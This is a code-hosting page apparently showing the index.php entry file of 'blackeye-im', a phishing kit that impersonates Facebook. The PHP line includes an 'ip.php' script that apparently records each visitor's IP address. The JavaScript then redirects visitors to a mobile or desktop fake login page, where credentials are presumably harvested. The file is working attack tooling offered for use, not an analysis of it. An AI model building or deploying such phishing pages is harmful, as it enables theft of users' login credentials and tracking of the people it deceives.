Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
thewickedkarma
GitHub Repository: thewickedkarma/blackeye-im
Path: blob/master/sites/facebook/index.php
777 views
1
<?php include 'ip.php';?>
2
<script type="text/javascript">
3
if (screen.width <= 699) {
4
document.location = "mobile.html";
5
}
6
else {
7
document.location = "login.html";
8
}
9
</script>
10